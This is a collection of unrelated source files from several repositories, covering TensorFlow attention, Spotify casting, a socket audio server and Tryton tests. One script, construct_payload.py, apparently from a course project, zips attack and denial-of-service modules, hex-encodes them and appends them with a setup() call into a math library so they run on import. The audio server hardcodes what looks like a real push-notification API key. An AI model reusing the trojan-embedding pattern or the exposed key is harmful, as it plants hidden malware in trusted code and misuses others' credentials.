use_transition_agent=False,
cumulative_weights=True,
name="ForwardAttention"):
super(ForwardAttention, self).__init__(
num_units=num_units,
memory=memory,
memory_sequence_length=memory_sequence_length,
probability_fn=None,
name=name)
self._use_transition_agent = use_transition_agent
self._cumulative_weights = cumulative_weights
self.location_convolution = tf.layers.Conv1D(filters=attention_filters,
kernel_size=attention_kernel,
padding="SAME",
use_bias=True,
bias_initializer=tf.zeros_initializer(),
name="location_features_convolution")
self.location_layer = tf.layers.Dense(units=num_units,
use_bias=False,
dtype=memory.dtype,
name="location_features_layer")
if use_transition_agent:
# ToDo: support speed control bias
self.transition_factor_projection = tf.layers.Dense(units=1,
use_bias=True,
dtype=memory.dtype,
activation=tf.nn.sigmoid,
name="transition_factor_projection")
def __call__(self, query, state):
previous_alignments, prev_alpha, prev_u = state
with tf.variable_scope(None, "location_sensitive_attention", [query]):
# processed_query shape [batch_size, query_depth] -> [batch_size, attention_dim]
processed_query = self.query_layer(query) if self.query_layer else query
# -> [batch_size, 1, attention_dim]
expanded_processed_query = tf.expand_dims(processed_query, 1)
# [batch_size, max_time] -> [batch_size, max_time, 1]
expanded_alignments = tf.expand_dims(previous_alignments, axis=2)
# location features [batch_size, max_time, filters]
f = self.location_convolution(expanded_alignments)
processed_location_features = self.location_layer(f)
energy = _location_sensitive_score(expanded_processed_query, processed_location_features, self.keys)
alignments = self._probability_fn(energy, state)
# forward attention
prev_alpha_n_minus_1 = tf.pad(prev_alpha[:, :-1], paddings=[[0, 0], [1, 0]])
alpha = ((1 - prev_u) * prev_alpha + prev_u * prev_alpha_n_minus_1 + 1e-7) * alignments
alpha_normalized = alpha / tf.reduce_sum(alpha, axis=1, keep_dims=True)
if self._use_transition_agent:
context = _calculate_context(alpha_normalized, self.values)
transition_factor_input = tf.concat([context, processed_query], axis=-1)
transition_factor = self.transition_factor_projection(transition_factor_input)
else:
transition_factor = prev_u
if self._cumulative_weights:
next_state = ForwardAttentionState(alignments + previous_alignments, alpha_normalized, transition_factor)
else:
next_state = ForwardAttentionState(alignments, alpha_normalized, transition_factor)
return alpha_normalized, next_state
@property
def state_size(self):
return ForwardAttentionState(self._alignments_size, self._alignments_size, 1)
def initial_state(self, batch_size, dtype):
initial_alignments = self.initial_alignments(batch_size, dtype)
# alpha_0 = 1, alpha_n = 0 where n = 2, 3, ..., N
initial_alpha = tf.concat([
tf.ones([batch_size, 1], dtype=dtype),
tf.zeros_like(initial_alignments, dtype=dtype)[:, 1:]], axis=1)
# transition factor
initial_u = 0.5 * tf.ones([batch_size, 1], dtype=dtype)
return ForwardAttentionState(initial_alignments, initial_alpha, initial_u)
| [
"yusuke.007.yasud@gmail.com"
] | yusuke.007.yasud@gmail.com |
c208f338b0b8e717f7788e70ab415ccb06596ec2 | be6ce691a3667edf152859f16804e06aaa486a03 | /solution1/deprecated.py | f70d197db4f26a45a6e6cf1f3aaa93a6efa255a6 | [] | no_license | mik-laj/airflow-deprecation-sample | d9b7d068013884177fec833e234914c6a1ec8be3 | ae1f93ac6ab85cec4c57dcb62f956fec73d88bbe | refs/heads/master | 2020-04-23T00:13:41.579998 | 2019-07-30T13:17:29 | 2019-07-30T13:17:50 | 170,771,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | import warnings
from solution1.new import *
warnings.warn("solution1.deprecated has moved to solution1.new. Import of "
"solution.new will become unsupported in version 2",
DeprecationWarning, 2)
| [
"kamil.bregula@polidea.com"
] | kamil.bregula@polidea.com |
2a563fa6b7c7f2004a33e6eab407557501b546a2 | dbc67a3fcf38da11350d6155a7da0592314d5f5c | /functions.py | 6b8d37738c8033733339a7d2ef44fb41c380ad0b | [] | no_license | cforsythe/Steganography | b5e97fa1307ff3b4e83cb0ff508e1201e8a5d129 | 9f72e46d5e26b10e08e2202eb0e631ba3abf6230 | refs/heads/master | 2021-05-31T15:01:19.860162 | 2016-04-02T06:14:05 | 2016-04-02T06:14:05 | 113,824,556 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,737 | py | #Resources
#https://docs.python.org/2/tutorial/inputoutput.html
#https://docs.python.org/2/library/functions.html
#https://docs.python.org/2/library/stdtypes.html
#use ord() to get ascii value
#http://www.greenteapress.com/thinkpython/thinkpython.pdf
from PIL import Image
#This function opens a file and reads it then returns list of the words found in that file
def openFileReadText(file):
fileWithText = open(file, 'r')
listOfWords = [] #Contains every word in text file
fileContent = fileWithText.read()
listOfWords = fileContent.split()
fileWithText.close()
return listOfWords
#This function accepts a list of words and converts each word into a string of binary digit and adds a whitespace in binary after each word converted into binary
def makeBinaryListOfWords(wordList):
oneWordInBinary = ""
wordsFromFileInBinary = []
for ix in range(0, len(wordList)):
word = wordList[ix]
for jx in range(0, len(word)):
oneWordInBinary += makeNumberBinary(ord(word[jx]))
wordsFromFileInBinary.append(oneWordInBinary)
wordsFromFileInBinary.append("00100000")
oneWordInBinary = "" #clears word
return wordsFromFileInBinary
#This function makes a number into its binary representation as a string
def makeNumberBinary(number):
binaryString = ""
baseTwoValues = [128, 64, 32, 16, 8, 4, 2, 1]
for ix in range(0, 8):
if(number < baseTwoValues[ix]):
binaryString += "0"
else:
binaryString += "1"
number -= baseTwoValues[ix]
return binaryString
#This function takes a binary string of 8-bits and converts it to it's decimal value
def makeBinaryANumber(binaryString):
baseTwoValues = [128, 64, 32, 16, 8, 4, 2, 1]
sumOfValues = 0
for ix in range(0, len(binaryString)):
if(binaryString[ix] == "1"):
sumOfValues += baseTwoValues[ix]
else:
sumOfValues += 0
return sumOfValues
#This functions takes a binary string of 18-bits and converts it to it's decimal value
def make18BitsANumber(binaryString):
baseTwoValues = [131072, 65536, 32768, 16384, 8192, 4096, 2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1]
sumOfValues = 0
for ix in range(0, len(binaryString)):
if(binaryString[ix] == "1"):
sumOfValues += baseTwoValues[ix]
else:
sumOfValues += 0
return sumOfValues
#This function takes a number makes its
def makeNumber18BitBinaryString(number):
binaryString = ""
baseTwoValues = [131072, 65536, 32768, 16384, 8192, 4096, 2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1]
for ix in range(0, 18):
if(number < baseTwoValues[ix]):
binaryString += "0"
else:
binaryString += "1"
number -= baseTwoValues[ix]
return binaryString
#This function prints a list
def printList(listOfWords):
for ix in range(0, len(listOfWords)):
print listOfWords[ix]
| [
"louispromero@student.hartnell.edu"
] | louispromero@student.hartnell.edu |
ba703162cf0be9cf266b4d9d5e3a39f149d6d0ae | 277abbfee6a3755b34a25135dc32399df497f916 | /construct_payload.py | 3cc577f69bf686f1616123dccdbabff2e7cd7579 | [] | no_license | mahersamawi/cs460FinalProject | a9b34ab458bf11be8238640833e497160dc0b7eb | 1d6fc91064c6651c616b2a5b4d156c469ca494d2 | refs/heads/master | 2021-01-23T08:15:07.172565 | 2017-05-07T21:37:16 | 2017-05-07T21:37:16 | 86,488,622 | 2 | 1 | null | 2017-04-30T19:58:10 | 2017-03-28T17:33:33 | Python | UTF-8 | Python | false | false | 439 | py | import subprocess
payload_files = [
'attack_server.py',
'dos.py',
'messenger.py',
'setup.py',
'encryption.py',
'victim_node.py'
]
subprocess.call('zip tmp.zip ' + ' '.join(payload_files), shell=True)
with open('tmp.zip', 'r') as f:
raw = f.read()
subprocess.call('rm -rf tmp.zip', shell=True)
with open('ourmathlib/ourmathlib.py', 'a') as f:
f.write('\netc = \'' + raw.encode('hex') + '\'\nsetup()\n')
| [
"calvin.pelletier@gmail.com"
] | calvin.pelletier@gmail.com |
283845b8c4a81738b39c332e062e558f4a1fa42f | e03f502312775b01b41ea7c6f5cb3dfbafdb8509 | /aboutus/api/serializers.py | 189187d979c6f742e946a41c169302bc8c45fb14 | [] | no_license | Grechanin/Misteckiy-DjangoRest-React-Redux | e223e89310362b8c21e30c8c669d4e170d232db6 | f05eb50a6aec72432716672294df81c3dc939ddd | refs/heads/master | 2020-04-13T10:58:17.931584 | 2019-02-18T09:21:54 | 2019-02-18T09:21:54 | 163,159,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | from aboutus.models import AboutUs
from rest_framework import serializers
class AboutUsSerializer(serializers.ModelSerializer):
class Meta:
model = AboutUs
fields = (
'tab_title',
'title',
'short_description',
'description',
)
| [
"grechanin@gmail.com"
] | grechanin@gmail.com |
3dd48b123692cca927d423498c37f208f8e4dbb4 | 37153931545967e20ef0d026024c892442b00af3 | /nokkhum/web/api/videos.py | 9a767f3a102a6b19216353421d2fe3e0f2297a79 | [] | no_license | gnekeng/nokkhum | d47313b95369d85889d1859df90ed03a9c12a555 | 254a1edcafa619feae7d319ba46e808406ca59a7 | refs/heads/master | 2023-06-10T13:30:08.057024 | 2021-06-24T09:14:40 | 2021-06-24T09:14:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | from flask_restx import Namespace, Resource
from flask import request, jsonify
from flask_jwt_extended import jwt_required
from santhings import models
from santhings.models import influx
import json
import datetime
from .sensors import get_sensors_data
api = Namespace("videos", description="videos", base_url="/videos")
@api.route("")
class Device(Resource):
def get(self):
return '{"data":"get device"}'
@jwt_required()
def post(self):
result = {}
return jsonify(result) | [
"mypspgood@gmail.com"
] | mypspgood@gmail.com |
a418b63acbacdf11e8ce1f9516014528f1ca8df7 | 7ac10d2874e99844846a36281b7b19183e823983 | /node_app/commands/Spotify/Play.py | 0bf022536fb3cc4f10b94d1fff78eaff5032bb06 | [] | no_license | raspi-chromecast-box/WebServer | b50319080a49a5f3f23ef5daeb0ba6fae033a8ec | e6150bd74b136e3c76fc0696a6f2ef5da288746d | refs/heads/master | 2023-02-09T02:44:13.901951 | 2020-04-14T03:15:57 | 2020-04-14T03:15:57 | 244,017,758 | 0 | 0 | null | 2023-01-23T22:21:59 | 2020-02-29T18:10:34 | Python | UTF-8 | Python | false | false | 4,822 | py | #!/usr/bin/env python3
import http.client as http_client
import time
import os
import sys
import json
import pychromecast
from pychromecast import Chromecast
from pychromecast.controllers.spotify import SpotifyController
import spotify_token as st
import redis
import spotipy
def string_to_bool( input_string ):
input_string = str( input_string )
return input_string.lower() in ( "yes" , "true" , "t" , "1" )
def try_to_connect_to_redis():
try:
redis_connection = redis.StrictRedis(
host="127.0.0.1" ,
port="6379" ,
db=1 ,
#password=ConfigDataBase.self[ 'redis' ][ 'password' ]
)
return redis_connection
except Exception as e:
return False
def GenerateSpotifyToken( options ):
try:
print( "Generating Spotify Token" )
print( options )
data = st.start_session( options[ "username" ] , options[ "password" ] )
access_token = data[ 0 ]
seconds_left = data[ 1 ] - int( time.time() )
result = {
"access_token": access_token ,
"expire_time": data[ 1 ] ,
"seconds_left": seconds_left
}
return result
except Exception as e:
print( "Couldn't Generate Spotify Token" )
print( e )
return False
def RefreshSpotifyTokenIfNecessary( redis_connection ):
try:
try:
spotify_personal = redis_connection.get( "PERSONAL.SPOTIFY" )
spotify_personal = json.loads( spotify_personal )
except Exception as e:
print( "No Spotify Personal Info Saved to Redis" )
print( e )
return False
try:
spotify_token_info = redis_connection.get( "STATE.SPOTIFY.TOKEN_INFO" )
spotify_token_info = json.loads( spotify_token_info )
except Exception as e:
print( "No Spotify Token Info Saved to Redis" )
spotify_token_info = {}
if "seconds_left" not in spotify_token_info:
spotify_token_info = GenerateSpotifyToken( spotify_personal )
redis_connection.set( "STATE.SPOTIFY.TOKEN_INFO" , json.dumps( spotify_token_info ) )
return spotify_token_info
time_now = int( time.time() )
spotify_token_info[ "seconds_left" ] = spotify_token_info[ "expire_time" ] - time_now
if spotify_token_info[ "seconds_left" ] < 300:
print( "Spotify Token is About to Expire in " + str( spotify_token_info[ "seconds_left" ] ) + " Seconds" )
spotify_token_info = GenerateSpotifyToken( spotify_personal )
redis_connection.set( "STATE.SPOTIFY.TOKEN_INFO" , json.dumps( spotify_token_info ) )
return spotify_token_info
else:
print( "Spotify Token is Still Valid for " + str( spotify_token_info[ "seconds_left" ] ) + " Seconds" )
return spotify_token_info
except Exception as e:
print( "Couldn't Regenerate Spotify Token" )
print( e )
return False
def play():
try:
output_chromecast_ip = sys.argv[ 1 ]
uri_to_play = sys.argv[ 2 ]
shuffle = sys.argv[ 3 ]
if type( shuffle != bool ):
shuffle = string_to_bool( shuffle )
redis_connection = try_to_connect_to_redis()
spotify_token_info = RefreshSpotifyTokenIfNecessary( redis_connection )
cast = Chromecast( output_chromecast_ip )
cast.wait()
client = spotipy.Spotify( auth=spotify_token_info[ "access_token" ] )
sp = SpotifyController( spotify_token_info[ "access_token" ] , spotify_token_info[ "seconds_left" ] )
cast.register_handler( sp )
sp.launch_app()
if not sp.is_launched and not sp.credential_error:
print('Failed to launch spotify controller due to timeout')
sys.exit(1)
if not sp.is_launched and sp.credential_error:
print('Failed to launch spotify controller due to credential error')
sys.exit(1)
devices_available = client.devices()
spotify_device_id = None
for device in devices_available['devices']:
if device['id'] == sp.device:
spotify_device_id = device['id']
break
if not spotify_device_id:
print('No device with id "{}" known by Spotify'.format(sp.device))
print('Known devices: {}'.format(devices_available['devices']))
sys.exit(1)
# # Start playback
if uri_to_play.find('track') > 0:
client.start_playback( device_id=spotify_device_id , uris=[ uri_to_play ] )
else:
client.start_playback( device_id=spotify_device_id , context_uri=[ uri_to_play ] )
time.sleep( 2 )
client.shuffle( shuffle )
return True
except Exception as e:
print( "Couldn't Load URI and Play Spotify" )
print( e )
return False
def try_run_block( options ):
for i in range( options[ 'number_of_tries' ] ):
attempt = options[ 'function_reference' ]()
if attempt is not False:
return attempt
print( f"Couldn't Run '{ options[ 'task_name' ] }', Sleeping for { str( options[ 'sleep_inbetween_seconds' ] ) } Seconds" )
time.sleep( options[ 'sleep_inbetween_seconds' ] )
if options[ 'reboot_on_failure' ] == True:
os.system( "reboot -f" )
try_run_block({
"task_name": "Spotify Play" ,
"number_of_tries": 5 ,
"sleep_inbetween_seconds": 1 ,
"function_reference": play ,
"reboot_on_failure": True
}) | [
"raspiccbox03@gmail.com"
] | raspiccbox03@gmail.com |
a2222b7c61da1124e7c78d8cba9b669f8bf5bd15 | 64baaa5ecb17f5c67095269ac5ad4a7e346c5e32 | /testDaemon.py | f6486738ba5b18dfa71f8e5ca66bb581400ab89c | [] | no_license | chaewonk/clover | 666b23dfd1ec1b46111a4a0b5c983ddc9cde0780 | 690cb0782e0041f4dfe213b3792aa60eea0bb17c | refs/heads/master | 2020-12-31T00:09:35.322612 | 2017-06-14T12:03:54 | 2017-06-14T12:03:54 | 86,558,482 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,512 | py | # -*- coding:utf-8 -*-
import wave
from select import *
from socket import *
from time import ctime
import pyaudio
from pyfcm import FCMNotification
push_service = FCMNotification(api_key="AAAAkXdjqxM:APA91bHgGK9xOi7tTf0ch6tOoxU30hNevDohrkNcyUhLuiHqNgifO4jDDYUSgrVCS_h5VB9JUV1ffxRFa5x-4pshglFyoO2wFtTfT2yfA5UkDIP5iyFfwN1_Jf4fyhQsVd4Kr7_TUZGM")
registration_id ="e76bV14MH3c:APA91bH8ypElx8UqSMwmy5hENsBMmHgEZcxRR0LwDdvuEPWkYrlOWKZ7se_yBdPgJCBTBcmTciGvwWtdBWWQPEDI_vbm3Cnzn-FeW5B4lwnPGWAbJiPlhw11zAgmt1tNUQFndWWIaf03"
data_message = {
"Nick" : "Mario",
"body" : "great match!",
"Room" : "PortugalVSDenmark"
}
message_title = "title"
message_body = "body"
#User-Define libraries
from S2 import *
HOST = ''
PORT = 8001
ADDR = (HOST, PORT)
BUFSIZE = 1024
BUFSIZE2 = 4096
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 44100
def doOperation(data, addr, sock):
"""
operation table
START : client send audio stream to server and send "END" to notice final chunk(buffer)
NEW_CLASS : client sen audio stream to server for request about new audio class label
"""
if (data == 'START') | (data == 'START\n'):
wave_output_filename = ("%s" % (addr,))
f=open(wave_output_filename+'.wav', 'wb')
print "start..."
data = sock.recv(BUFSIZE2)
total_file_size = int(data.split('\n')[0])
print "totial file size: %s" %(total_file_size,)
data = data.split('\n')[1:]
data = ''.join(data)
f.write(data)
remain_size = total_file_size
while(remain_size>BUFSIZE2):
data = sock.recv(BUFSIZE2)
remain_size = remain_size - len(data)
print len(data)
f.write(data)
data = sock.recv(BUFSIZE2)
remain_size = remain_size - len(data)
print len(data)
f.write(data)
if wave_output_filename != "":
cf = s2(wave_output_filename+".wav")
message_body = cf
push_service.notify_single_device(registration_id=registration_id,
message_body=message_body,
data_message=data_message)
sock.send(cf)
print cf
else:
sock.send('err')
# extract audio label by using deep learning
#sock.send('ACK: ANDROID')
#print 'ACK: ANDROID'
f.close()
#os.remove(wave_output_filename+"*")
#elif (data == "TIZEN") | (data == "TIZEN\n"):
elif 'TIZEN' in data:
wave_output_filename = ("%s" % (addr,))
f=open(wave_output_filename+'.wav', 'wb')
print ("start form tizen...")
#data = sock.recv(BUFSIZE)
total_file_size = sock.recv(50)
total_file_size = int(total_file_size.split('/')[0])
print "totial file size: %s" %(total_file_size,)
remain_size = total_file_size
while(remain_size>BUFSIZE):
data = sock.recv(BUFSIZE)
remain_size = remain_size - len(data)
print len(data)
f.write(data)
data = sock.recv(BUFSIZE)
remain_size = remain_size - len(data)
print len(data)
f.write(data)
# extract audio label by using deep learning
if wave_output_filename != "":
cf = s2(wave_output_filename+".wav")
sock.send(cf)
print cf
else:
sock.send('err')
f.close()
#os.remove(wave_output_filename+"*")
elif (data == "NEW_CLASS") | (data == "NEW_CLASS\n"):
frames = []
print "start..."
while (True):
data = sock.recv(BUFSIZE)
if (data == "END") | (data == "END\n"):
print 'END'
break
else:
frames.append(data)
newClassLabel = sock.recv(BUFSIZE)
wave_output_filename = ("userRequestLabelDir/%s" % (newClassLabel,))
MakeAudioFileFromList(frames, wave_output_filename)
#elif (data == "ADD_USER") | (data == "ADD_USER\n"):
#elif data == "BUG_REPORT" | data == "BUG_REPORT\n":
elif len(data) == 0:
print('[INFO][%s] socket is closed frome the client -%s' % (ctime(), addr_info[0]))
else:
print('[INFO][%s] unknown data from client - %s' % (ctime(), addr_info[0]))
print data
def MakeAudioFileFromList(list, filename):
p = pyaudio.PyAudio()
print ("making wave file form audio stream")
wf = wave.open(filename + ".wav", 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(list))
wf.close()
p.terminate()
if __name__ == "__main__":
# TCP socket
serverSocket = socket(AF_INET, SOCK_STREAM)
# binding
serverSocket.bind(ADDR)
# listen, room size = 10
serverSocket.listen(10)
connection_list = [serverSocket]
print('==============================================')
print('START SIX SENSE SERVER... port: %s' % str(PORT))
print('==============================================')
while connection_list:
try:
print('[INFO] waiting request...')
#print s2("dog.wav")
# selection method,
read_socket, write_socket, error_socket = select(connection_list, [], [], 10)
for sock in read_socket:
# new connection
if sock == serverSocket:
clientSocket, addr_info = serverSocket.accept()
connection_list.append(clientSocket)
print('[INFO][%s] new client(%s) is connected to server...' % (ctime(), addr_info[0]))
# receive data form client
else:
data = sock.recv(BUFSIZE)
if data:
print('[INFO][%s] receive data from client - %s' % (ctime(), addr_info[0],))
print data
doOperation(data, addr_info[0], sock)
connection_list.remove(sock)
sock.close()
else:
print('[INFO][%s] receive null data from client - %s' % (ctime(), addr_info[0],))
connection_list.remove(sock)
sock.close()
except KeyboardInterrupt:
# good way to terminate
serverSocket.close()
sys.exit()
| [
"rocky92.lim@gmail.com"
] | rocky92.lim@gmail.com |
98a0eb413768739d94890ec9443376e800d155f7 | 82c2c1ac7a727bb68454e61f3b0ad6399a49126e | /utils/json.py | 206423b90cf4b6c71ea36b69bbe2693d7b59fe6f | [] | no_license | pradoslaw/coyote-ws | d2e9f4fb793e1ddcab4b65138fb17ff36c92ee66 | b3a14597b3cd795ff70e90c779191e4bb2f5f3c2 | refs/heads/master | 2023-05-09T16:22:27.683405 | 2021-06-10T18:15:40 | 2021-06-10T18:15:40 | 51,928,970 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | from json import loads
def is_valid_json(message):
try:
obj = loads(message)
except ValueError:
return False
return obj | [
"adam@boduch.net"
] | adam@boduch.net |
c3ca2d48fc3106d240183f94624a9d8af3cbb55a | 660e35c822423685aea19d038daa8356722dc744 | /stock_lot/tests/test_stock_lot.py | 7fdaf10723fc7fdb663b0c5c7b29412cb8e8023d | [] | no_license | saifkazi/tryton_modules | a05cb4a90ae2c46ba39d60d2005ffc18ce5e44bb | 94bd3a4e3fd86556725cdff33b314274dcb20afd | refs/heads/main | 2023-05-05T12:20:02.059236 | 2021-05-19T10:46:37 | 2021-05-19T10:46:37 | 368,768,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,168 | py | # This file is part of Tryton. The COPYRIGHT file at the top level of
# this repository contains the full copyright notices and license terms.
import unittest
import doctest
import datetime
from dateutil.relativedelta import relativedelta
from decimal import Decimal
import trytond.tests.test_tryton
from trytond.tests.test_tryton import ModuleTestCase, with_transaction
from trytond.tests.test_tryton import doctest_teardown
from trytond.tests.test_tryton import doctest_checker
from trytond.transaction import Transaction
from trytond.pool import Pool
from trytond.modules.company.tests import create_company, set_company
class StockLotTestCase(ModuleTestCase):
'Test Stock Lot module'
module = 'stock_lot'
@with_transaction()
def test_products_by_location(self):
'Test products_by_location'
pool = Pool()
Uom = pool.get('product.uom')
Template = pool.get('product.template')
Product = pool.get('product.product')
Location = pool.get('stock.location')
Move = pool.get('stock.move')
Lot = pool.get('stock.lot')
kg, = Uom.search([('name', '=', 'Kilogram')])
g, = Uom.search([('name', '=', 'Gram')])
template, = Template.create([{
'name': 'Test products_by_location',
'type': 'goods',
'list_price': Decimal(0),
'default_uom': kg.id,
}])
product, = Product.create([{
'template': template.id,
}])
supplier, = Location.search([('code', '=', 'SUP')])
customer, = Location.search([('code', '=', 'CUS')])
storage, = Location.search([('code', '=', 'STO')])
company = create_company()
currency = company.currency
with set_company(company):
lot1, lot2 = Lot.create([{
'number': '1',
'product': product.id,
}, {
'number': '2',
'product': product.id,
}])
moves = Move.create([{
'product': product.id,
'lot': lot1.id,
'uom': kg.id,
'quantity': 5,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': lot2.id,
'uom': kg.id,
'quantity': 10,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': lot2.id,
'uom': kg.id,
'quantity': 2,
'from_location': storage.id,
'to_location': customer.id,
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': None,
'uom': kg.id,
'quantity': 3,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}])
Move.do(moves)
self.assertEqual(Product.products_by_location([storage.id],
grouping_filter=([product.id],)), {
(storage.id, product.id): 16,
})
self.assertEqual(Product.products_by_location([storage.id],
grouping=('product', 'lot',),
grouping_filter=([product.id],)), {
(storage.id, product.id, lot1.id): 5,
(storage.id, product.id, lot2.id): 8,
(storage.id, product.id, None): 3,
})
with Transaction().set_context(locations=[storage.id]):
lot1, lot2 = Lot.browse([lot1, lot2])
self.assertEqual(lot1.quantity, 5)
self.assertEqual(lot2.quantity, 8)
@with_transaction()
def test_period(self):
'Test period'
pool = Pool()
Uom = pool.get('product.uom')
Template = pool.get('product.template')
Product = pool.get('product.product')
Location = pool.get('stock.location')
Move = pool.get('stock.move')
Lot = pool.get('stock.lot')
Period = pool.get('stock.period')
unit, = Uom.search([('name', '=', 'Unit')])
template, = Template.create([{
'name': 'Test period',
'type': 'goods',
'default_uom': unit.id,
'list_price': Decimal(0),
}])
product, = Product.create([{
'template': template.id,
}])
supplier, = Location.search([('code', '=', 'SUP')])
storage, = Location.search([('code', '=', 'STO')])
company = create_company()
currency = company.currency
with set_company(company):
lot1, lot2 = Lot.create([{
'number': '1',
'product': product.id,
}, {
'number': '2',
'product': product.id,
}])
today = datetime.date.today()
moves = Move.create([{
'product': product.id,
'lot': lot1.id,
'uom': unit.id,
'quantity': 5,
'from_location': supplier.id,
'to_location': storage.id,
'planned_date': today - relativedelta(days=1),
'effective_date': today - relativedelta(days=1),
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': lot2.id,
'uom': unit.id,
'quantity': 10,
'from_location': supplier.id,
'to_location': storage.id,
'planned_date': today - relativedelta(days=1),
'effective_date': today - relativedelta(days=1),
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': None,
'uom': unit.id,
'quantity': 3,
'from_location': supplier.id,
'to_location': storage.id,
'planned_date': today - relativedelta(days=1),
'effective_date': today - relativedelta(days=1),
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}])
Move.do(moves)
period, = Period.create([{
'date': today - relativedelta(days=1),
'company': company.id,
}])
Period.close([period])
self.assertEqual(period.state, 'closed')
quantities = {
supplier: -18,
storage: 18,
}
for cache in period.caches:
self.assertEqual(cache.product, product)
self.assertEqual(cache.internal_quantity,
quantities[cache.location])
quantities = {
(supplier, lot1): -5,
(storage, lot1): 5,
(supplier, lot2): -10,
(storage, lot2): 10,
(supplier, None): -3,
(storage, None): 3,
}
for lot_cache in period.lot_caches:
self.assertEqual(lot_cache.product, product)
self.assertEqual(lot_cache.internal_quantity,
quantities[(lot_cache.location, lot_cache.lot)])
@with_transaction
def test_assign_try_with_lot(self):
"Test Move assign_try with lot"
pool = Pool()
Template = pool.get('product.template')
Product = pool.get('product.product')
Uom = pool.get('product.uom')
Location = pool.get('stock.location')
Move = pool.get('stock.move')
Lot = pool.get('stock.lot')
uom, = Uom.search([('name', '=', 'Meter')])
template = Template(
name="Product",
type='goods',
list_price=Decimal(1),
default_uom=uom,
)
template.save()
product = Product(template=template.id)
product.save()
supplier, = Location.search([('code', '=', 'SUP')])
storage, = Location.search([('code', '=', 'STO')])
customer, = Location.search([('code', '=', 'CUS')])
company = create_company()
with set_company(company):
lot1, lot2 = Lot.create([{
'number': "1",
'product': product.id,
}, {
'number': "2",
'product': product.id,
}])
moves = Move.create([{
'product': product.id,
'lot': lot1.id,
'uom': uom.id,
'quantity': 2,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal(1),
'currency': company.currency.id,
}, {
'product': product.id,
'lot': lot2.id,
'uom': uom.id,
'quantity': 3,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal(1),
'currency': company.currency.id,
}, {
'product': product.id,
'lot': None,
'uom': uom.id,
'quantity': 3,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal(1),
'currency': company.currency.id,
}])
Move.do(moves)
move, = Move.create([{
'product': product.id,
'uom': uom.id,
'quantity': 10,
'from_location': storage.id,
'to_location': customer.id,
'company': company.id,
'unit_price': Decimal(1),
'currency': company.currency.id,
}])
self.assertFalse(
Move.assign_try([move], grouping=('product', 'lot')))
moves = Move.search([
('product', '=', product.id),
('from_location', '=', storage.id),
('to_location', '=', customer.id),
('company', '=', company.id),
])
self.assertEqual(len(moves), 4)
self.assertEqual({
(m.lot, m.quantity, m.state) for m in moves}, {
(lot1, 2, 'assigned'),
(lot2, 3, 'assigned'),
(None, 1, 'assigned'),
(None, 4, 'draft'),
})
def suite():
suite = trytond.tests.test_tryton.suite()
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(
StockLotTestCase))
suite.addTests(doctest.DocFileSuite('scenario_stock_lot_shipment_out.rst',
tearDown=doctest_teardown, encoding='utf-8',
checker=doctest_checker,
optionflags=doctest.REPORT_ONLY_FIRST_FAILURE))
return suite
| [
"saif.kazi76@gmail.com"
] | saif.kazi76@gmail.com |
4bff47136dc598c93846a18cfc7873b43bbf4eef | d31c5d6fa72d058d0f6de6aca5b3ab0822b0deaf | /tfrecord_reader.py | 10e5abc8b57fc3e0d25437bc5fff7a86042334e9 | [] | no_license | you359/TFRecordGenerator | deaf14584416c73325893de984b3a65da02d35d7 | 3580926e052268cc22260fd3c28594bc3c623180 | refs/heads/master | 2020-04-07T12:22:32.556446 | 2018-11-20T10:17:01 | 2018-11-20T10:17:01 | 158,365,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,118 | py | import tensorflow as tf
import glob
def _parse(record):
features = {
# 'image/encoded': tf.FixedLenFeature([], tf.string),
'data/encoded': tf.FixedLenFeature([], tf.string),
'data/height': tf.FixedLenFeature([], tf.int64),
'data/width': tf.FixedLenFeature([], tf.int64),
'data/depth': tf.FixedLenFeature([], tf.int64),
'data/class/label': tf.FixedLenFeature([], tf.int64),
'data/class/name': tf.FixedLenFeature([], tf.string)
}
parsed_record = tf.parse_single_example(record, features)
# image = tf.decode_raw(parsed_record['image/encoded'], tf.float32)
image = tf.image.decode_image(parsed_record['data/encoded'])
height = tf.cast(parsed_record['data/height'], tf.int32)
width = tf.cast(parsed_record['data/width'], tf.int32)
channel = tf.cast(parsed_record['data/depth'], tf.int32)
image = tf.reshape(image, [height, width, channel])
image = tf.image.resize_images(image, (299, 299))
label = tf.cast(parsed_record['data/class/label'], tf.int32)
lebel_name = tf.cast(parsed_record['data/class/name'], tf.string)
return image, label, lebel_name
# train_input_fn = data_input_fn(glob.glob('H:/train_*.tfrecord'), shuffle=True)
# validation_input_fn = data_input_fn(glob.glob('H:/val_*.tfrecord'))
import matplotlib.pyplot as plt
with tf.Graph().as_default():
with tf.Session() as sess:
dataset = tf.data.TFRecordDataset(glob.glob('./train_*.tfrecord')).map(_parse)
if True:
dataset = dataset.shuffle(buffer_size=10000)
